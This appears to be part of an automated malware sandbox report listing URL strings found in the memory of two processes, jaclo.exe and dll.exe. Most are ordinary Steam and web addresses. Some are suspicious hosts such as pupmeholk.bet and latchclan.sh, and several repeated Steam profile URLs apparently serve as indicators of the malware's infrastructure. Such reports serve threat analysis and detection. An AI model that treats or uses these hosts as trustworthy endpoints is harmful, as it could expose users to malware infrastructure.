Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: jaclo.exe, 0000000D.00000002.1400600163.0000000001343000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001343000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://latchclan.sh
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: dll.exe, 00000010.00000003.1553180293.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000122F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pupmeholk.bet/
Source: dll.exe, 00000010.00000003.1495951794.000000000122F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pupmeholk.bet/#kK
Source: dll.exe, 00000010.00000003.1553303136.00000000011E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pupmeholk.bet/pLoska
Source: dll.exe, 00000010.00000003.1496127922.000000000401A000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496471640.000000000402E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496217135.000000000402D000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523442445.0000000004030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pupmeholk.bet/pLoskaDGcj9wXRZ1
Source: dll.exe, 00000010.00000003.1573715800.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1611980427.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527625878.00000000011CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pupmeholk.bet:443/pLoska
Source: dll.exe, 00000010.00000003.1553303136.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1573715800.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527625878.00000000011CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pupmeholk.bet:443/pLoskaofiles/76561199822375128
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000400F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: dll.exe, 00000010.00000002.1613070327.0000000004000000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/(
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: dll.exe, 00000010.00000002.1612064321.000000000120A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558165150.0000000001209000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/Q
Source: jaclo.exe, 0000000D.00000002.1400600163.0000000001325000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001324000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/X
Source: dll.exe, 00000010.00000002.1611980427.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553303136.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610970478.00000000011C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/a
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: jaclo.exe, 0000000D.00000003.1397924687.000000000136C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400600163.0000000001343000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1398064042.000000000137A000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001343000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400600163.000000000136C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400725676.000000000137B000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1613070327.0000000004000000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612147123.0000000001255000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436310085.00000000011FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128
Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/badges
Source: dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496127922.000000000401A000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496560456.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553410634.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523296079.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1613114498.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523271647.0000000004014000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558249415.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558094984.0000000004015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/inventory/
Source: dll.exe, 00000010.00000002.1613070327.0000000004000000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611998223751288
Source: dll.exe, 00000010.00000003.1573715800.00000000011E2000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128E
Source: jaclo.exe, 0000000D.00000003.1397924687.0000000001350000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400600163.0000000001350000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/s
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: dll.exe, 00000010.00000003.1587060011.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527625878.00000000011CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199822375128
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamloopback.host
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: jaclo.exe, 0000000D.00000003.1385496112.000000000137B000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.000000000136C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1398064042.000000000137A000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400725676.000000000137B000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496894411.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612242339.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436290691.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558746783.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1573715800.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423975243.000000000120A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: jaclo.exe, 0000000D.00000003.1385496112.000000000137B000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.000000000136C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1398064042.000000000137A000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400725676.000000000137B000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496894411.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612242339.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558746783.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1573715800.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523271647.0000000004014000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496560456.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523477884.0000000004015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou
Source: dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496127922.000000000401A000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496560456.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
